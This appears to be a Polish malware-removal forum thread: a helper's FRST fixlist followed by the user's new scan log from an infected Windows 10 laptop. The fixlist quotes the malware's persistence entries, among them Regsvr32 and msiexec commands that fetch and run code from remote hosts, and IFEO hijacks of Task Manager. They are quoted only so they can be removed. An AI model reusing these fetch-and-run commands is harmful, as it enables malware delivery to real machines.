2017-04-17 15:33 - 2017-04-17 15:33 - 00000000 ____D C:\Users\Emil\AppData\Roaming\Firefox
2017-04-22 12:11 - 2017-04-22 12:11 - 00000000 ____D C:\Users\Emil\AppData\Local\Boxbob
2017-04-22 00:37 - 2017-04-22 00:37 - 00000000 ____D C:\Program Files (x86)\MK
2017-04-22 00:37 - 2017-04-22 00:37 - 00000000 ____D C:\Program Files (x86)\AlphaGo
2017-04-21 15:03 - 2017-04-21 15:03 - 00000000 ____D C:\Program Files (x86)\Boxbob
2017-04-21 14:57 - 2017-04-21 14:57 - 00000000 _____ C:\WINDOWS\SysWOW64\11
2017-04-22 13:12 - 2017-04-22 13:12 - 00000523 _____ C:\Users\Emil\Downloads\SearchReg.txt
2017-04-22 13:12 - 2017-04-22 13:12 - 00000523 _____ C:\Users\Emil\Desktop\SearchReg.txt
S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
R2 3DM; C:\Users\Emil\AppData\Local\3DM\Kitty.dll [754688 2017-04-18] (kitty.exe) [Brak podpisu cyfrowego]
Edge HomeButtonPage: HKU\S-1-5-21-2400838556-3398951076-1685541893-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT
FEO\DisplaySwitch.exe: [Debugger]
IFEO\taskmgr.exe: [Debugger]
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1SNTI5NdlQOTkxFdLWOWY4RTH1MWLLNWQQRjZSFUY2Mq== /q
FirewallRules: [{F7732D69-5F2B-49EF-A088-0C5F55CD4590}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxmq01abd100_46unp9zutxx46unp9zut.dat
FirewallRules: [{250D5170-77A3-49BE-A6F9-959AEB7F445C}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxmq01abd100_46unp9zutxx46unp9zut.dat
FirewallRules: [{6B452E6C-FC12-4789-8ECD-60201D3B8758}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{D0DF2BF7-4CE5-494A-9206-37D9BFD681A1}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{CCBCC04A-35E9-42C6-AAB2-CF119B915162}] => (Allow) C:\Program Files (x86)\Boxbob\Application\chrome.exe
C:\Program Files (x86)\MIO
RemoveDirectory: C:\Program Files (x86)\Firefox
C:\Users\Public\Desktop\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
Task: {627837C5-4A24-45D8-8540-1F8FF3948FB9} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1SNTI5NdlQOTkxFdLWOWY4RTH1MWLLNWQQRjZSFUY2Mq== scrobj.dll
Task: {42B3F5AF-883C-4486-9188-2DB20304944E} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1SNTI5NdlQOTkxFdLWOWY4RTH1MWLLNWQQRjZSFUY2Mq== scrobj.dll
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe
Uruchom FRST i kliknij przycisk Fix (NAPRAW).

Zrób nowe logi FRST.

Napisz, jaka sytuacja?

Autor postu otrzymał pochwałę
ordynat
~user
 
Posty: 4419
Dołączenie: 02 Kwi 2010, 11:18
Pochwały: 792



Problem z mozilla i zawieszającym się systemem

Postprzez emillo2502 24 Kwi 2017, 13:53

Mam teraz problem jeszcze z tym https://zapodaj.net/5bc032bb48989.png.html
Wyłączam to i samo się urochamia.

FRST
Kod: Zaznacz wszystko
Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x64) Wersja: 23-04-2017 01
Uruchomiony przez Emil (administrator)  LAPTOP-PH67M221 (24-04-2017 13:42:54)
Uruchomiony z C:\Users\Emil\Downloads
Załadowane profile: Emil (Dostępne profile: Emil)
Platform: Windows 10 Home Wersja 1607 (X64) Język: Polski (Polska)
Internet Explorer Wersja 11 (Domyślna przeglądarka: Edge)
Tryb startu: Normal
Instrukcja obsługi Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Procesy (filtrowane) =================

(Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
() C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\AOP Framework\CCDMonitorService.exe
(Windows (R) Win 7 DDK provider) C:\Windows\System32\AdminService.exe
() C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe
() C:\Program Files (x86)\My Connection\ApplicationController.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
() C:\Windows\SysWOW64\PnkBstrB.exe
(Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe
(McAfee, Inc.) C:\Program Files\TrueKey\McTkSchedulerService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
(Intel Security, Inc.) C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe
(McAfee, Inc.) C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\platform\mcsvchost\McSvHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\VSCore_15_6\mcapexe.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\2.3.253.0\McCSPServiceHost.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Microsoft Corporation) C:\Windows\System32\mshta.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(McAfee, Inc.) C:\Program Files\Common Files\Intel Security\PEF\CORE\OobeHook.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\ePowerButton_NB.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QASvc.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QALSvc.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QAAgent.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QALockHandler.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QAAdminAgent.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\platform\McUICnt.exe
() C:\OEM\Preload\FubTracking\FubTracking.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
() C:\Program Files\Realtek\Audio\HDA\FMAPP.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.11.523\SSScheduler.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Reader 9.0\Reader\reader_sl.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Dashlane SAS) C:\Program Files (x86)\Dashlane\Upgrade\DashlaneUpgradeService.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8017.5925.0_x64__8wekyb3d8bbwe\Office16\OfficeHubTaskHost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\backgroundTaskHost.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe
(Acer) C:\Program Files (x86)\Acer\Acer Portal\AcerPortal.exe
(Acer Cloud Technology) C:\Program Files (x86)\Acer\AOP Framework\acer\ccd.exe

==================== Rejestr (filtrowane) ====================

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [14040792 2015-07-07] (Realtek Semiconductor)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2398776 2016-06-15] (NVIDIA Corporation)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2017-03-28] (Microsoft Corporation)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe [37296 2012-01-03] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [843712 2012-01-02] (Adobe Systems Incorporated)
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\MountPoints2: E - "E:\Setup.exe"
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\MountPoints2: F - "F:\setup.exe"
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\MountPoints2: {3c034b37-b73a-11e6-9da4-74dfbf750d6c} - "E:\Setup.exe"
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\MountPoints2: {780173ea-b3bd-11e6-9da1-74dfbf750d6c} - "F:\setup.exe"
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\MountPoints2: {bd31849f-d1b1-11e6-9dab-54ab3abfe915} - "H:\HiSuiteDownLoader.exe"
IFEO\DisplaySwitch.exe: [Debugger]
Lsa: [Notification Packages] scecli C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter
ShellIconOverlayIdentifiers: [ ACloudSynced] -> {5CCE71FA-9F61-4F24-9CD1-98D819B40D68} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2015-10-15] (Acer Incorporated)
ShellIconOverlayIdentifiers: [ ACloudSyncing] -> {C1E1456F-C2D8-4C96-870D-35F1E13941EE} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2015-10-15] (Acer Incorporated)
ShellIconOverlayIdentifiers: [ ACloudToBeSynced] -> {307523FA-DDC0-4068-983F-2A6B34627744} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2015-10-15] (Acer Incorporated)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Brak pliku
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2017-04-02]
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.523\SSScheduler.exe (McAfee, Inc.)

==================== Internet (filtrowane) ====================

(Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.)

Hosts: 0.0.0.1   mssplus.mcafee.com
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{178678cf-1ec5-4aeb-833f-f89587024ab7}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{dbbf9db0-56ad-4631-b98a-46ab3cfd876f}: [DhcpNameServer] 192.168.2.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\Software\Microsoft\Internet Explorer\Main,Start Page =
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-03-06] (Microsoft Corporation)
BHO: McAfee WebAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-04-18] (McAfee, Inc.)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-03-06] (Microsoft Corporation)
BHO-x32: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll [2016-11-02] (Intel Security)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-01-03] (Adobe Systems Incorporated)
BHO-x32: McAfee WebAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-04-18] (McAfee, Inc.)
Toolbar: HKLM-x32 - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll [2016-11-02] (Intel Security)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-04-18] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-04-18] (McAfee, Inc.)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-04-18] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-04-18] (McAfee, Inc.)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll [2017-03-03] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll [2017-03-03] (McAfee, Inc.)

FireFox:
========
FF DefaultProfile: zao9ohxy.default
FF ProfilePath: C:\Users\Emil\AppData\Roaming\Mozilla\Firefox\Profiles\zao9ohxy.default [2017-04-24]
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\zao9ohxy.default -> Google
FF Homepage: Mozilla\Firefox\Profiles\zao9ohxy.default -> about:home
FF Extension: (Amazon Assistant for Firefox) - C:\Users\Emil\AppData\Roaming\Mozilla\Firefox\Profiles\zao9ohxy.default\Extensions\abb-acer@amazon.com [2016-11-25]
FF Extension: (Polski Language Pack) - C:\Users\Emil\AppData\Roaming\Mozilla\Firefox\Profiles\zao9ohxy.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-04-20]
FF Extension: (Mozilla Partner Defaults) - C:\Users\Emil\AppData\Roaming\Mozilla\Firefox\Profiles\zao9ohxy.default\Extensions\partnerdefaults@mozilla.com [2016-11-25]
FF Extension: (Greasemonkey) - C:\Users\Emil\AppData\Roaming\Mozilla\Firefox\Profiles\zao9ohxy.default\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2017-02-22]
FF Extension: (McAfee WebAdvisor) - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2017-02-14]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: (McAfee Anti-Spam Thunderbird Extension) - C:\Program Files\McAfee\MSK [2017-03-14] [Brak podpisu cyfrowego]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_25_0_0_127.dll [2017-04-06] ()
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2017-03-03] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_127.dll [2017-04-06] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1225195.dll [2016-09-20] (Adobe Systems, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2017-03-03] ()
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-03-06] (Microsoft Corporation)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\2\NP_wtapp.dll [2017-04-08] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll [2012-01-03] (Adobe Systems Inc.)

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx

==================== Usługi (filtrowane) ====================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

R2 Amazon Assistant Service; C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantService.exe [102064 2017-02-28] ()
R2 AtherosSvc; C:\WINDOWS\system32\AdminService.exe [355760 2016-06-26] (Windows (R) Win 7 DDK provider)
R2 CCDMonitorService; C:\Program Files (x86)\Acer\AOP Framework\CCDMonitorService.exe [2267352 2016-08-30] (Acer Incorporated)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3735744 2017-03-02] (Microsoft Corporation)
S3 ClientAnalyticsService; C:\Program Files\Common Files\McAfee\ClientAnalytics\Legacy\McClientAnalytics.exe [1701840 2016-12-08] (Intel Security)
R2 Dashlane Upgrade Service; C:\Program Files (x86)\Dashlane\Upgrade\DashlaneUpgradeService.exe [82968 2016-04-08] (Dashlane SAS)
R2 FLAME II HSPA USB MODEM Service; C:\Program Files (x86)\My Connection\ApplicationController.exe [574464 2015-09-24] () [Brak podpisu cyfrowego]
S2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [350576 2017-04-08] (WildTangent)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [382456 2017-02-01] (Intel Corporation)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-22] (Intel(R) Corporation)
S3 Intel(R) Security Assist; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [335872 2015-05-19] (Intel Corporation) [Brak podpisu cyfrowego]
R2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe [7680 2015-05-19] () [Brak podpisu cyfrowego]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [223008 2015-06-24] (Intel Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [188264 2017-04-18] (McAfee, Inc.)
R2 McAPExe; C:\Program Files\Common Files\McAfee\VSCore_15_6\McApExe.exe [989632 2017-01-23] (McAfee, Inc.)
S3 McAWFwk; C:\Program Files\Common Files\McAfee\ActWiz\McAWFwk.exe [353128 2015-11-27] (McAfee, Inc.)
R2 McBootDelayStartSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.523\McCHSvc.exe [404376 2017-03-20] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\2.3.253.0\\McCSPServiceHost.exe [2053568 2016-11-16] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [1342904 2017-02-01] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [241040 2016-11-14] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [383032 2016-11-14] (McAfee, Inc.)
R3 mfevtp; C:\Windows\system32\mfevtps.exe [342768 2016-11-14] (McAfee, Inc.)
R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1465840 2016-12-22] (McAfee, Inc.)
S3 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [458176 2016-12-29] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [3634232 2016-06-15] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2522680 2016-06-15] (NVIDIA Corporation)
R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [1104304 2016-11-15] (Intel Security, Inc.)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [66872 2016-12-07] ()
R2 PnkBstrB; C:\Windows\SysWOW64\PnkBstrB.exe [107832 2016-12-07] ()
R3 QALSvc; C:\Program Files\Acer\Acer Quick Access\QALSvc.exe [440224 2016-03-11] (Acer Incorporated)
R3 QASvc; C:\Program Files\Acer\Acer Quick Access\QASvc.exe [481696 2016-03-11] (Acer Incorporated)
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
R2 TrueKey; C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe [990656 2016-10-28] (McAfee, Inc.)
R2 TrueKeyScheduler; C:\Program Files\TrueKey\McTkSchedulerService.exe [16248 2016-10-28] (McAfee, Inc.)
S3 TrueKeyServiceHelper; C:\Program Files\TrueKey\McAfee.TrueKey.ServiceHelper.exe [86864 2016-10-28] (McAfee, Inc.)
S3 UEIPSvc; C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe [291232 2016-02-01] (acer)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2017-03-28] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2017-03-28] (Microsoft Corporation)

===================== Sterowniki (filtrowane) ======================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

R3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [88456 2016-11-18] (McAfee, Inc.)
S1 cfywlan2; C:\WINDOWS\system32\DRIVERS\cfywlan2.sys [46088 2017-02-05] (Connectify)
S1 cnnctfy4; C:\WINDOWS\system32\DRIVERS\cnnctfy4.sys [53216 2017-02-05] (Connectify)
S3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2016-11-25] (Disc Soft Ltd)
S3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [47672 2016-11-25] (Disc Soft Ltd)
R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77440 2017-04-20] ()
S3 HipShieldK; C:\WINDOWS\System32\drivers\HipShieldK.sys [216704 2016-08-02] (McAfee, Inc.)
R3 LMDriver; C:\WINDOWS\System32\drivers\LMDriver.sys [21408 2016-03-11] (Acer Incorporated)
R2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [186304 2017-04-20] (Malwarebytes)
R3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [111544 2017-04-24] (Malwarebytes)
